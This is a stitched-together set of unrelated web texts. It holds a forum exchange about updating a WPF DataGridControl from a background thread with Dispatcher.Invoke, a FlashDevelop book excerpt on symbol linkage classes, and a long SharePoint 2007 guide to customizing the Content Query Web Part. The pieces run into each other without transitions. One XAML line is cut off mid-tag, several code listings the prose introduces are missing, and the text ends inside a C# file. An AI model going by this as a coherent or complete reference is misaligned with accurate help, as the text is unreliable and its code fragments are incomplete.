>>>>>>> Ruta.wrapAnalysisEngine(URL, String, boolean String) line: 96
>>>>>>> RutaLauncher.main(String[]) line: 119
>>>>>>>
>>>>>>> What did I do wrong?
>>>>>> What is the structure of your Ruta project? Is the script you launched
>>>>>> within a source (script) folder?
>>>>>>
>>>>>> The message surprises me a bit. Was there an xmi file in the output
>>>>>> folder? Maybe there was an exception and eclipse tried to jump to
the
>>>>>> position, but couldn't find the sources.
>>>>>>
>>>>>>> Anyways, no obvious mis-linkages; Is this what you expect from
running as an
>>>>>>> installed plugin (not in Eclipse App Debug mode)?
>>>>>> Nope, it should - of course - work without any problems. I will try
to
>>>>>> reproduce it ASAP.
>>>>>>
>>>>>>
>>>>>> Peter
>>>>>>
>>>>>>> -Marshall
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> On 9/3/2013 12:34 PM, Peter Klügl wrote:
>>>>>>>> On 03.09.2013 18:09, Marshall Schor wrote:
>>>>>>>>> On 9/3/2013 11:26 AM, Peter Klügl wrote:
>>>>>>>>>> On 03.09.2013 16:58, Marshall Schor wrote:
>>>>>>>>>>> On 9/2/2013 1:17 PM, Peter Klügl wrote:
>>>>>>>>>>>> Hi,
>>>>>>>>>>>>
>>>>>>>>>>>> I had a hard time to adapt the ruta.engine
bundle to the new layout,
>>>>>>>>>>>> which we use in the runtime plugin.
>>>>>>>>>>>>
>>>>>>>>>>>> Can someone explain to me the import section
in the manifest of the
>>>>>>>>>>>> runtime plugin? Why doesn't that cause problems
either when starting
>>>>>>>>>>>> eclipse or when building it with maven?
>>>>>>>>>>> hmmm, let's see how much I can remember :-)
>>>>>>>>>>>
>>>>>>>>>>> The bundle plugin can do 2 different things:
1) prepare a manifest, and 2) add
>>>>>>>>>>> things to the target/classes to be JARed up (at
a later time, perhaps), if the
>>>>>>>>>>> packaging type for the POM is "Jar".
>>>>>>>>>>>
>>>>>>>>>>> The POM could say the packaging type is "bundle",
but we use "jar" - this keeps
>>>>>>>>>>> the bundle plugin from doing the Jar, and allows
the mvn Jar plugin to do that
>>>>>>>>>>> (which, in turn, allows us to follow the apache
conventions for what goes into a
>>>>>>>>>>> Jar).
>>>>>>>>>>>
>>>>>>>>>>> The bundle plugin is typically driven by "export-package"
statements. These
>>>>>>>>>>> get added to the manifest *and* are added
to the bundle's Jar. Except,
>>>>>>>>>>> since we're not using the "bundle" packaging, this
2nd step does something slightly
>>>>>>>>>>> different - it adds (if not already present)
the package to the target/classes
>>>>>>>>>>> (to be eventually added to the Jar in a later
Maven step). What gets added
>>>>>>>>>>> includes whatever can be found with that package
name in the sources
>>>>>>>>>>> (non-existent for runtime-plugins) and the dependency
jars.
>>>>>>>>>>>
>>>>>>>>>>> However, for the runtime plugin, we don't want
to add classes individually; we
>>>>>>>>>>> want to include entire sub-jars in our to-be-built-Jar.
>>>>>>>>>>>
>>>>>>>>>>> To support this, the bundle plugin has two instructions.
>>>>>>>>>>>
>>>>>>>>>>> 1) replace <Export-Package> with <_exportcontents>.
This does exactly the same
>>>>>>>>>>> thing as Export-Package for the manifest, but
doesn't do any actions re: copying
>>>>>>>>>>> dependencies into the target/classes spot.
>>>>>>>>>>>
>>>>>>>>>>> 2) add an <Embed-Dependency> statement
- This does 2 things: for each
>>>>>>>>>>> dependency, it (a) copies the Jar into the target/classes,
at some "path" - we
>>>>>>>>>>> use "" as the path - so these jars are copied
directly into target/classes, and
>>>>>>>>>>> will be zipped up by the subsequent mvn jar plugin.
>>>>>>>>>>>
>>>>>>>>>>> The 2nd thing it does is it adds to the manifest
a Bundle-Classpath element,
>>>>>>>>>>> specifying all the jars that got embedded, with
the right "path" inside the
>>>>>>>>>>> enclosing Jar.
>>>>>>>>>> I am quite sure that this does not work if you launch
an eclipse (Ruta
>>>>>>>>>> Workbench) with Eclipse 3.7.2. I tried a lot, but
the current trunk
>>>>>>>>>> works now only with newer eclipse installations.
>>>>>>>>> I tested 3.7.2 eclipse with 2.4.2 uima, and that worked
OK. So I think this
>>>>>>>>> approach does work.
>>>>>>>> Have you used the sources of the runtime plugin or an installed
version?
>>>>>>>> Or have you build it and put it in the dropins folder?
>>>>>>>>
>>>>>>>>> If you can make an SVN branch with this kind of approach,
I'll offer to check it
>>>>>>>>> out, build it, and then (with some guidance from you
:-) ) run some simple tests
>>>>>>>>> that you think will show the "problem", and have a look...
>>>>>>>> Testing is greatly appreciated :-)
>>>>>>>>
>>>>>>>> It's already in the trunk.
>>>>>>>>
>>>>>>>> Here's what I normally do when I test the Ruta Workbench:
>>>>>>>> - use eclipse 3.7.2 with subclipse, m2e with connectors
>>>>>>>> - install uima tooling and dltk 3.0 (eclipse update site)
>>>>>>>> - mvn clean install on ruta project
>>>>>>>> - select ruta-ep-ide -> run as eclipse application
>>>>>>>> - this will probably fail, increase the permgen space in
the launch
>>>>>>>> configuration that was created: add "-XX:PermSize=64M
>>>>>>>> -XX:MaxPermSize=128M" to the vm args
>>>>>>>> - launch eclipse again
>>>>>>>> - switch to the UIMA Ruta perspective
>>>>>>>> - right click in the script explorer and create a new UIMA
Ruta project,
>>>>>>>> e.g. Test
>>>>>>>> - right click on the script folder and create a new UIMA
Ruta script
>>>>>>>> file, e.g. Test
>>>>>>>> - fill the script file, e.g., with "W;"
>>>>>>>>
>>>>>>>> -> problems should occur here, at latest, because antlr
cannot be found
>>>>>>>> for parsing the script file. Normally, the CharStream class
is not found.
>>>>>>>>
>>>>>>>> - create a new txt file with some words in the input folder
>>>>>>>> - select the open editor of the script file
>>>>>>>> - press the debug button (launch debug config)
>>>>>>>> - open the xmi file in the output folder
>>>>>>>> - switch to the UIMA Ruta Explain perspective
>>>>>>>> - take a look at the Applied Rules view, this view should
contain some
>>>>>>>> rule matches
>>>>>>>>
>>>>>>>> Best,
>>>>>>>>
>>>>>>>> Peter
>>>>>>>>
>>>>>>>>> -Marshall
>>>>>>>>>>> This latter thing is what allows Eclipse to find
the packages inside the bundle
>>>>>>>>>>> inside the inner Jars.
>>>>>>>>>>>
>>>>>>>>>>> With this approach, no "import-package" statements
are used, unless you need to
>>>>>>>>>>> specify some non-default kind of resolution,
or "negate" some part of the
>>>>>>>>>>> import. Without import-package statements, the
default is to import all
>>>>>>>>>>> dependent packages.
>>>>>>>>>>>
>>>>>>>>>>> So, I would try: replace import-package with
_exportcontents, and add the Embed
>>>>>>>>>>> Dependencies element
>>>>>>>>>>>
>>>>>>>>>>> Does that work for you? If not, please describe
what's not working. See the
>>>>>>>>>>> uimaj-ep-runtime pom for an example of this.
>>>>>>>>>> Yes, I looked at uimaj-ep-runtime and adapted ruta-ep-engine.
>>>>>>>>>>
>>>>>>>>>> I do not know if I can summarize all problems :-(
>>>>>>>>>>
>>>>>>>>>> I think the main difference is that runtime does
not have any real
>>>>>>>>>> dependencies, but engine has. Therefore, the generated
import section in
>>>>>>>>>> the engine manifest contains really many packages.
I really wonder about
>>>>>>>>>> a few ones like groovy.lang, org.jruby, ... These
imports are of course
>>>>>>>>>> not resolved when I start eclipse with the bundle.
If I restrict the
>>>>>>>>>> imports to only those I need, then the bundle plugin
complains and stops
>>>>>>>>>> with an error.
>>>>>>>>>>
>>>>>>>>>> The only solution I found was to specify the import
section like that
>>>>>>>>>> one in my last mail: import the stuff I need (uima)
and exclude every
>>>>>>>>>> other namespace that would have been added to the
section.
>>>>>>>>>>
>>>>>>>>>> Well, it works now, but I am still a bit upset about
how the bundle
>>>>>>>>>> plugin handles the import section and wonder why,
e.g., the runtime
>>>>>>>>>> plugin needs an import section (in the manifest)
at all.
>>>>>>>>>>
>>>>>>>>>> Best,
>>>>>>>>>>
>>>>>>>>>> Peter
>>>>>>>>>>
>>>>>>>>>>
>>>>>>>>>>> -Marshall
>>>>>>>>>>>
>>>>>>>>>>>> I got my plugin to work, but do not really
know why. I had to added
>>>>>>>>>>>> something like the following to the maven-bundle-plugin:
>>>>>>>>>>>>
>>>>>>>>>>>> <Import-Package>
>>>>>>>>>>>> org.apache.uima.*,
>>>>>>>>>>>> !antlr, !bsh, !com.jamonapi, !com.sun.net.httpserver,
>>>>>>>>>>>> !edu.emory.mathcs.backport.java.util.concurrent,
>>>>>>>>>>>> !groovy.lang, !javax.annotation, !javax.ejb,
>>>>>>>>>>>> !javax.el, !javax.inject,
>>>>>>>>>>>> !javax.interceptor, !javax.jms,
>>>>>>>>>>>> !javax.management, !javax.management.modelmbean,
>>>>>>>>>>>> !javax.management.openmbean,
>>>>>>>>>>>> !javax.management.remote,
>>>>>>>>>>>> !javax.naming, !javax.persistence.spi,
!javax.rmi, !javax.servlet,
>>>>>>>>>>>> !javax.swing, !javax.swing.border,
>>>>>>>>>>>> !javax.swing.event, !javax.swing.text,
!javax.swing.tree,
>>>>>>>>>>>> !javax.validation,
>>>>>>>>>>>> !javax.validation.bootstrap,
>>>>>>>>>>>> !javax.validation.metadata, !javax.xml.namespace,
>>>>>>>>>>>> !javax.xml.parsers, !javax.xml.stream,
>>>>>>>>>>>> !javax.xml.stream.events, !javax.xml.stream.util,
>>>>>>>>>>>> !javax.xml.transform, !javax.xml.transform.sax,
>>>>>>>>>>>> !javax.xml.transform.stax,
>>>>>>>>>>>> !javax.xml.ws, !joptsimple, !net.sf.cglib.*,
!net.sf.ehcache.*,
>>>>>>>>>>>> !org.antlr.stringtemplate,
>>>>>>>>>>>> !org.apache.avalon.framework.logger,
>>>>>>>>>>>> !org.apache.commons.pool,
>>>>>>>>>>>> !org.apache.commons.pool.impl,
>>>>>>>>>>>> !org.apache.log, !org.apache.log4j, !org.apache.log4j.xml,
>>>>>>>>>>>> !org.aspectj.*, !org.codehaus.groovy.*,
!org.hibernate.* ,
>>>>>>>>>>>> !org.joda.*, !org.jruby.*, !org.omg.CORBA,
>>>>>>>>>>>> !org.springframework.instrument,
>>>>>>>>>>>> !org.w3c.dom, !org.xml.sax, !org.xml.sax.ext,
!org.xml.sax.helpers
>>>>>>>>>>>> </Import-Package>
>>>>>>>>>>>>
>>>>>>>>>>>>
>>>>>>>>>>>> Best,
>>>>>>>>>>>>
>>>>>>>>>>>> Peter
>>>>>>>>>>>>
> | http://mail-archives.us.apache.org/mod_mbox/uima-dev/201309.mbox/%3C522757BF.8050900@schor.com%3E | CC-MAIN-2019-26 | refinedweb | 2,365 | 63.9 |
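For readers following along: the <_exportcontents> / <Embed-Dependency> approach Marshall describes, and the Import-Package trimming Peter posted, both live in the maven-bundle-plugin configuration of the POM. A minimal illustrative sketch of that pattern (package patterns here are placeholders, not the actual ruta-ep-engine or uimaj-ep-runtime POM):

```
<plugin>
  <groupId>org.apache.felix</groupId>
  <artifactId>maven-bundle-plugin</artifactId>
  <configuration>
    <instructions>
      <!-- Same manifest effect as Export-Package, but without copying
           dependency classes into target/classes -->
      <_exportcontents>org.example.myplugin.*</_exportcontents>
      <!-- Copy each dependency jar itself into target/classes (path "")
           and list it on the manifest's Bundle-ClassPath -->
      <Embed-Dependency>*;scope=compile;inline=false</Embed-Dependency>
      <!-- Import what is really needed; negate packages the analyzer
           would otherwise pull in from the embedded jars -->
      <Import-Package>org.apache.uima.*,!groovy.lang,!org.jruby.*</Import-Package>
    </instructions>
  </configuration>
</plugin>
```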
Struts Projects
the
database
Struts Projects explains here can be used as dummy project to learn...
Struts project. Download
the source code of Struts Hibernate Integration Tutorial...
Struts Projects
Easy Struts Projects to learn and get into development
Hello - Struts
to going with connect database using oracle10g in struts please write the code and send me its very urgent
only connect to the database code
Hi soniya,
Please implement following code
struts 2 project samples
struts 2 project samples please forward struts 2 sample projects like hotel management system.
i've done with general login application and all.
Ur answers are appreciated.
Thanks in advance
Raneesh
Hello - Struts
of project....open pop-up menu and access all page store in the database
Hello - Struts
Hello Hi,
Can u tell me what is hard code please send example of hard code... Hi Friend !
Hard coding refers to the software... into the source code of a program or other executable object, or fixed formatting of the data
How to build a Struts Project - Struts
How to build a Struts Project Please Help me. i will be building a small Struts Projects, please give some Suggestion & tips,
I am new to struts.Please send the sample code for login and registration sample code with backend as mysql database.Please send the code immediately.
Please its urgent.
Regards,
Valarmathi Hi Friend
Struts - Struts
Java Bean tags in struts 2 i need the reference of bean tags in struts 2. Thanks! Hello,Here is example of bean tags in struts 2:http... code will help you learn Struts 2.Thanks like to make a registration form in struts inwhich... compelete code.
thanks Hi friend,
Please give details with full source code to solve the problem.
Mention the technology you have - Struts
Struts Hello
I have 2 java pages and 2 jsp pages in struts... with source code to solve the problem.
For read more information on Struts visit...
Hello + USERNAME
and it should also display if name is administrator Hello !
I have a servlet page and want to make login page in struts 1.1
What changes should I make for this?also write struts-config.xml and jsp code.
Code is shown below
struts
struts shopping cart project in struts with oracle database connection shopping cart project in struts with oracle database connection
Have a look at the following link:
Struts Shopping Cart using MySQL
Error - Struts
to test the examples
Run Struts 2 Hello...Error Hi,
I downloaded the roseindia first struts example... create the url for that action then
"Struts Problem Report
Struts has detected
struts 3.1 - Struts
struts 3.1 how to use struts 3.1.x version in our code as i am creating a project.
please reply as soon as possible
Struts Articles
, easy code, which you will be able to use in your own projects. Struts 1.2.4...) framework, and has proven itself in thousands of projects. Struts was ground-breaking...;
Strecks is built on the existing Struts 1.2 code base, adding a range of productivity start struts?
Hello Friend,
Please visit the following links:... can easily learn the struts.
Thanks
Struts Books
for applying Struts to J2EE projects and generally accepted best practices as well... for Struts applications, and scenarios where extending Struts is helpful (source code... it should be used on many (but not all) projects. Still, it is better to start a project
Struts 2 Hello World Annotation Example
Video tutorial of creating Struts 2 Hello World Annotation Example in
Eclipse... download the code of previous example from our tutorial page
Creating Hello... of creating Struts 2 Hello World Annotation Example:
Let's Starts
the checkbox.i want code in struts
struts code - Struts
struts code In STRUTS FRAMEWORK
we have a login form with fields
USERNAME:
In this admin
can login and also narmal uses can log...://
Thanks
Struts <s:include> - Struts
Struts Hello guys,
I have a doubt in struts tag.
what am i... the source code the content is blank and is not included.
am i going wrong somewhere? or struts doesnt execute tags inside fetched page?
the same include code
projects
projects hi'Sir thank's
How to make collage library projects in gui or java code with from design - Struts
Struts Hello Experts,
How can i comapare
in jsp scriptlet in if conditions like...
2.ApplicationResources_it.properties
Strictly Struts
Hello readers. Yes this is an article.... how to build a simple Struts HTML page using taglibs
6. how to code
Reply - Struts
Reply Hello Friends,
please write the code in struts and send me I want to display "Welcome to Struts" please send me code its very urgent... connection
Thanks HelloWorld.jsp
Struts 2 Hello World
Java hello friends,
i am using struts, in that i am using tiles framework. here i wrote the following code in tiles-def.xml
in struts-config file i wrote the following action tag
Struts 2 Validation
Struts 2 Validation Hello,I have been learning struts.
I have... to add the Users to the database. So, have implemented the code.
See attachement...):
create database project;
create table users
(userid smallint unsigned application
not enter any data that time also it
will saved into databaseprint("code sample...struts application hi,
i can write a struts application in this first i can write enter data through form sidthen it will successfully saved
Developing JSP, Java and Configuration for Hello World Application
and required configuration files for
our Struts 2 Hello World application. Now... on the "Run Struts 2 Hello World Application"
link on the tutorial...;Struts 2 Hello World Application!</title>
</head>
<body>
Struts 2 Tutorials - Struts version 2.3.15.1
dependency of Struts 2.3.15.1
Creating Hello World application in Struts 2 version... IDE
Hello World application annotation version
Struts 2 in Agile Development... about the different configuration options of the Struts 2 based
project
code - Struts
code How to write the code for multiple actions for many submit buttons. use dispatch action
pls review my code - Struts
pls review my code Hello friends,
This is the code in struts. when i click on the submit button.
It is showing the blank page. Pls respond soon its urgent.
Thanks in advance.
public class LOGINAction extends Action Hibernate Integration
and you can download and
start working on it for your project or to learn Struts...
In this section we will write Hibernate Struts Plugin Java code...
Struts Hibernate
Need Project
Need Project How to develop School management project by using Struts Framework? Please give me suggestion and sample examples for my...Using radio button in struts Hello to all ,
I have a big problem that i am trying to solve.
Here are the details :
I have a list of TV's
Struts Book - Popular Struts Books
is a "hands-on" book filled with sample applications and code snippets you can reuse... the development of a non-trivial sample application - covering all the Struts components... to the Jakarta Struts Cookbook an amazing collection of code solutions to common
Struts 1 Tutorial and example programs
Struts 1 Tutorials and many example code to learn Struts 1 in detail.
Struts 1... completing this tutorial you will be able to use Hibernate in your
Struts project. Download
the source code of Struts Hibernate Integration Tutorial
Reply - Struts
Reply
Thanks For Nice responce Technologies::--JSP
please write the code and send me....when click "add new button" then get the null value...its urgent... Hi
can u explain in details about your project
saritha project - Struts
Tapestry - Struts
Tapestry
I want to use Tooltip in my project,
in which i m using... tooltipcomponent or how can i put tooltip using tapestry in my project....
pls respond me fast
thanks Hi friend,
Code to help in solving
Labels in Struts 2.0 - Struts
Labels in Struts 2.0 Hello, how to get the Label name from properties file
Single thread model - Struts
Single thread model Hi Friedns , thank u in advance
1)I need sample code to find and remove duplicates in
arraylist and hashmap.
2) In struts, ow to implement singlthread model and threadsafe
login application - Struts
login application Can anyone give me complete code of user login application using struts and database? Hello,
Here is good example of Login and User Registration Application using Struts Hibernate and Spring
Opened 6 years ago
Closed 4 years ago
Last modified 4 years ago
#13997 closed New feature (fixed)
Add an example of constructing a MultiWidget and document the value_from_datadict method
Description
I've been trying to get a multiwidget but I could only see some(old) example on net, none in official docs...preatty hard to do without docs.
Attachments (4)
Change History (19)
comment:1 Changed 6 years ago by
comment:2 Changed 6 years ago by
comment:3 Changed 6 years ago by
Changed 6 years ago by
Documented using the Multiwidget with single value fields
comment:4 Changed 6 years ago by
I added a patch with an example widget for using a MultiWidget with the us.forms.USPhoneNumberField in localflavor.
Changed 6 years ago by
Modified the docs with better example and gave example usage.
Changed 6 years ago by
comment:5 Changed 6 years ago by
comment:6 Changed 5 years ago by
Milestone 1.3 deleted
comment:7 Changed 5 years ago by
comment:8 Changed 4 years ago by
It would be helpful if the documentation on MultiWidget also brought the
method value_from_datadict to the attention, next to decompress, to also have
the transformation from multiple widget values to the field value
(decompress does the reverse).
Example:
def value_from_datadict(self, data, files, name):
    values = super(MyMultiWidget, self).value_from_datadict(data, files, name)
    # i.e. return MyValueType(float(values[0]), float(values[1]))
    return MyValueType(... something with values ...)
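The round-trip between decompress() and value_from_datadict() can be illustrated without pulling in Django at all. A framework-free sketch of the contract (the name_0/name_1 subwidget naming follows Django's MultiWidget convention; everything else here, including PointWidget, is a hypothetical stand-in):

```python
class PointWidget:
    """Pretend MultiWidget with two numeric subwidgets."""

    def decompress(self, value):
        # compound value -> list of per-subwidget values
        if value is None:
            return [None, None]
        return [value[0], value[1]]

    def value_from_datadict(self, data, files, name):
        # submitted form data -> compound value (the reverse of decompress)
        values = [data.get('%s_%s' % (name, i)) for i in range(2)]
        return (float(values[0]), float(values[1]))

w = PointWidget()
print(w.decompress((1.5, 2.5)))                                      # [1.5, 2.5]
print(w.value_from_datadict({'p_0': '1.5', 'p_1': '2.5'}, {}, 'p'))  # (1.5, 2.5)
```

In real Django the base MultiWidget already implements value_from_datadict by collecting the subwidget values; you override it (or decompress) when the field's value is a compound type.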
comment:9 Changed 4 years ago by
comment:10 Changed 4 years ago by
We probably shouldn't use localflavor as an example at this point since it's being broken out into a separate package.
Changed 4 years ago by
comment:11 Changed 4 years ago by
I've added a patch that combines the two existing MultiWidget sections, documents value_from_datadict, and adds an example MultiWidget with an explanation of each method.
comment:12 Changed 4 years ago by
Looks great!
One sentence certainly isn't all that should be said about MultiWidget. It probably warrants a whole "Constructing A MultiWidget" section at the end of that page, complete with explanation and an example. | https://code.djangoproject.com/ticket/13997 | CC-MAIN-2016-44 | refinedweb | 358 | 50.77 |
You already know NumPy is a great python module for processing and manipulating multi-dimensional array. In this entire tutorial, you will learn how to reverse NumPy array through step by step.
There are three methods to reverse NumPy array. We will discuss all of them here.
- Using the Shortcut or slicing method
- Use of numpu.flip() method.
- Using numpy.flipud()
- Using numpu.flipr()
Step by Step implementation to reverse Numpy array
Step 1: Import all the necessary libraries.
Here we are using only NumPy libraries. That’s why I am importing it using the import statement.
import numpy as np
Step 2: Create NumPy array.
Now for the demonstration purpose lets we create a Numpy array. It will be of both single and multiple dimensions.
One Dimensional Array
array_1d = np.array([10,30,40,20])
Two Dimensional Array
array_2d = np.array([[10,30],[60,50]])
Step 3: Reverse Numpy Array.
Let’s reverse all the NumPy array I have created in step 2.
Method 1: Using the Shortcut.
The shortcut for reversing a NumPy array is slicing. Use the code below.
For 1-D Array
array_1d[::-1]
2 -D Array
array_2d[::-1]
Output:

    array_1d[::-1]  ->  array([20, 40, 30, 10])
    array_2d[::-1]  ->  array([[60, 50],
                               [10, 30]])
Method 2: Using the numpy.flip() method.

The numpy.flip() method accepts two arguments: the array you want to flip, and the axis (0, 1, or None; None, the default, flips over all axes). It is very useful if you want to flip specific rows or columns.
For 1-D Array
np.flip(array_1d)
2 -D Array
np.flip(array_2d)
Output:

    np.flip(array_1d)  ->  array([20, 40, 30, 10])
    np.flip(array_2d)  ->  array([[50, 60],
                                  [30, 10]])   # with axis=None, both axes are flipped
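Since flipping specific rows or columns is the main reason to reach for numpy.flip() over slicing, here is a short sketch of the axis argument in action:

```python
import numpy as np

array_2d = np.array([[10, 30], [60, 50]])

# axis=0 reverses the order of the rows (flip vertically)
print(np.flip(array_2d, axis=0))   # [[60 50]
                                   #  [10 30]]

# axis=1 reverses the order within each row (flip horizontally)
print(np.flip(array_2d, axis=1))   # [[30 10]
                                   #  [50 60]]
```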
Method 3: Using the numpy.flipud() method.
The third method for reversing the NumPy array is the numpy.flipud() method.
For 1-D Array
np.flipud(array_1d)
2 -D Array
To demonstrate for two-dimensional array, let’s create a diagonal matrix using the numpy.diag() method. I have not used the above 2D example here because the diagonal matrix clearly shows where the flipping has been done.
diagonal_matrix = np.diag([10,20,30])
Now pass it to the np.flipud() method as an argument. It will flip the array vertically (axis=0).
np.flipud(diagonal_matrix)
You will get the following output:

    array([[ 0,  0, 30],
           [ 0, 20,  0],
           [10,  0,  0]])
Method 4: Using the numpy.fliplr() method.
Now the last method to reverse a NumPy array is the numpy.fliplr() method. It flips an array horizontally (axis=1). There is one condition for using it: the array must be at least 2-dimensional. I am using the same diagonal matrix used in method 3.
Execute the following line of code.
np.fliplr(diagonal_matrix)
Output:

    array([[ 0,  0, 10],
           [ 0, 20,  0],
           [30,  0,  0]])
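Putting all four methods together in one runnable script (same arrays as above):

```python
import numpy as np

array_1d = np.array([10, 30, 40, 20])
diagonal_matrix = np.diag([10, 20, 30])

print(array_1d[::-1])               # [20 40 30 10]  (slicing)
print(np.flip(array_1d))            # [20 40 30 10]  (flip over all axes)
print(np.flipud(array_1d))          # [20 40 30 10]  (flip along axis 0)

print(np.flipud(diagonal_matrix))   # [[ 0  0 30]
                                    #  [ 0 20  0]
                                    #  [10  0  0]]
print(np.fliplr(diagonal_matrix))   # [[ 0  0 10]
                                    #  [ 0 20  0]
                                    #  [30  0  0]]

# np.fliplr() refuses 1-D input with a ValueError:
try:
    np.fliplr(array_1d)
except ValueError as e:
    print("fliplr needs >= 2 dims:", e)
```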
Conclusion
These are the methods for reversing a NumPy array. Methods 1, 2, and 3 work on both one- and multi-dimensional arrays, but method 4 works only on arrays with two or more dimensions.

Hope you liked this tutorial. If you have any questions, you can contact us for more info.
When I was preparing an IoT project with an Arduino & Ethernet shield,
I wanted to know the network performance of the Arduino, to check the bandwidth budget for the new IoT project.
I searched the Arduino site, Google and so on to get this data,
but there was no good, clear answer for me.
-----
So... I decided to check the Arduino network performance by myself,
and I think there are many who want to check network performance themselves.
-----
Just follow me, then you can check your Arduino network performance.
We will use the "iperf" tool to measure network performance. Refer to the link below to learn about iperf and how to install it.
We will use an Arduino and an Ethernet shield as the "iperf server".
There are many Arduino Ethernet shields, and I have several of them. I decided to use the WIZ550io as the Arduino Ethernet shield because it is the newest Ethernet shield from WIZnet and has better network performance than the original one.
First of all, we have to update the Ethernet library to use the WIZ550io as the Arduino Ethernet shield.
1. Download the WIZnet Ethernet Library
There is a "Download ZIP" which downloads everything in one neat little file.
-----
2. Copy the Ethernet folder into the Arduino Libraries folder. (Override built-in ethernet library)
[note] There are two versions of the Ethernet folder, depending on the version of your Arduino IDE.
-----
3. Verify Code
In the libraries/Ethernet/utility folder, open w5100.h and verify that only the 1 correct #define line is uncommented. For the WIZ550io it looks like below (and as in the picture).
//#define W5100_ETHERNET_SHIELD // Arduino Ethernet Shield and Compatibles ...
//#define W5200_ETHERNET_SHIELD // WIZ820io, W5200 Ethernet Shield
#define W5500_ETHERNET_SHIELD // WIZ550io, ioShield series of WIZnet
Next we will set up the PC in client mode.
-----
It is very simple.
Just open a command prompt window and
go to the directory where iperf is installed, using the "cd" and "dir" commands, as in the first picture of this step.
-----
Then type "iperf -c 192.168.1.177 -w 300k -t 100 -i 10" on the command line and press Enter, as in the picture.
Then you can see the resulting network performance between the Arduino and the computer.
In my case, network performance is 3.34Mbps.
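For reference, the flags in that command mean the following (standard iperf2 options):

```
iperf -c 192.168.1.177   # client mode; connect to the Arduino iperf server at this IP
      -w 300k            # request a 300 KB TCP window size
      -t 100             # run the test for 100 seconds
      -i 10              # print an intermediate bandwidth report every 10 seconds
```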
Step 5: Final : See Demo Video
Now, I/we can measure network performance.
Here is a demo video which test network performance.
Please enjoy it.
-----
Thank you.
2 Discussions
1 year ago
iperf3 didn't work... I had to use iperf2
Windows CMD:
iperf -c 192.168.22.11 -w 16k -t 20 -i 2
#include <SPI.h>
#include <Ethernet2.h>

// PC side: iperf -c 192.168.22.11 -w 16k -t 20 -i 2
byte mac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
IPAddress ip(192, 168, 22, 11);
IPAddress gateway(192, 168, 22, 1);
IPAddress dns_server(192, 168, 22, 1);
IPAddress subnet(255, 255, 0, 0);

EthernetServer server(5001);  // iperf2's default TCP port

void setup() {
  Ethernet.begin(mac, ip, dns_server, gateway, subnet);
  server.begin();
  Serial.begin(9600);
  while (!Serial) {
    ;  // wait for serial port to connect. Needed for native USB
  }
  Serial.print("Iperf server address : ");
  Serial.println(Ethernet.localIP());
  Serial.println(" ");
  SPI.setClockDivider(SPI_CLOCK_DIV2);
}

void loop() {
  byte buf[1024];
  EthernetClient client = server.available();
  if (client) {
    Serial.println("Here is new client for check arduino performance");
    while (client.connected()) {
      if (client.available()) client.read(buf, 1024);  // discard; we only measure throughput
    }
    client.stop();
    Serial.println("client disconnected");
  }
}
3 years ago
Is it possible to use the Arduino as an iperf client?
Thank you! | https://www.instructables.com/id/How-to-measure-Arduino-network-performance/ | CC-MAIN-2019-35 | refinedweb | 594 | 67.86 |
Write a program for an Internet provider that displays a MessageBox asking users whether they want Internet access. If they do not, their total price is $0. If they do, display a second MessageBox asking whether they want limited access (at $10.95 per month) or unlimited access (at $19.95 per month). Display the total price in a third MessageBox. Title the program InternetAccess.
Here is my code so far:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Internet
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void button1_Click(object sender, EventArgs e)
        {
            DialogResult unlimited;
            DialogResult choice = MessageBox.Show("Internet Services are available as limited access at $10.95 per month \n and unlimited access at $19.95 per month.\n Do you want internet connection?", "Internet Service", MessageBoxButtons.YesNo);
            if (choice == DialogResult.Yes)
                unlimited = MessageBox.Show("Do you want unlimited package?", "Package", MessageBoxButtons.YesNo);
            if (unlimited == DialogResult.Yes);
                MessageBox.Show("Your price is $19.95 per month");
            else;
                MessageBox.Show("Your price is $10.95 per month");
            else;
                MessageBox.Show("display a total price of $0");
        }
    }
}
I'm not at all sure where I am going wrong!
Well for a start an 'if' statement doesn't end in a semi-colon, and neither does 'else'.
Although not strictly speaking necessary, I would go with curly braces on all if statements for readability.
I presume you have this working now.
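Putting those fixes together (no semicolons after if/else, braces everywhere, and the nested if moved inside the outer branch so the $0 case is reachable), one possible correction of the original handler could look like this. This is an untested sketch using the poster's own names:

```csharp
private void button1_Click(object sender, EventArgs e)
{
    // First MessageBox: does the user want Internet access at all?
    DialogResult choice = MessageBox.Show(
        "Internet Services are available as limited access at $10.95 per month\n" +
        "and unlimited access at $19.95 per month.\nDo you want internet connection?",
        "Internet Service", MessageBoxButtons.YesNo);

    if (choice == DialogResult.Yes)
    {
        // Second MessageBox: limited or unlimited?
        DialogResult unlimited = MessageBox.Show(
            "Do you want the unlimited package?", "Package", MessageBoxButtons.YesNo);

        if (unlimited == DialogResult.Yes)
        {
            MessageBox.Show("Your price is $19.95 per month");
        }
        else
        {
            MessageBox.Show("Your price is $10.95 per month");
        }
    }
    else
    {
        // No Internet access requested, so the total price is $0.
        MessageBox.Show("Your total price is $0");
    }
}
```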
Get the user name associated with the calling process
Synopsis:

#include <unistd.h>

char *getlogin( void );

Library:

libc

Use the -l c option to qcc to link against this library. This library is usually included automatically.

Description:

The getlogin() function returns a pointer to a string containing the login name of the user associated with the calling process.

Returns:

A pointer to a string containing the user's login name, or NULL if the user's login name can't be found.

The return value from getlogin() may point to static data and, therefore, may be overwritten by each call.

Classification:

POSIX 1003.1

See also:

getlogin_r(), getpwent(), getpwent_r(), getpwnam(), getpwuid()
Home › Forums › WPF controls › Xceed DataGrid for WPF › Access the grid control from the App.cs
User (Old forums), Member, April 29, 2007 at 3:29 pm, Post count: 23064
Hi,
I apologize for my English first and foremost.
My application’s input is not through typing values into the grid, but rather through a different process, which inserts rows into the database.
After adding a new row to the database the grid does not refresh itself even though it is bound to the DataTable which has just been updated.
Therefore, I wish to have a handle to the grid in App.cs (where the input process runs) to enable me to use something like:
grid.Items.Refresh();
My grid resides in MainWindow.xaml.
The input process runs on App.cs.
When it finishes inserting a row I try using (within App.cs):
DataGridControl grid = (DataGridControl)(this.MainWindow.FindName("myGrid"));
but I get InvalidOperationException (The calling thread cannot access this object because a different thread owns it).
Please help.
Imported from legacy forums. Posted by Golan (had 2476 views)

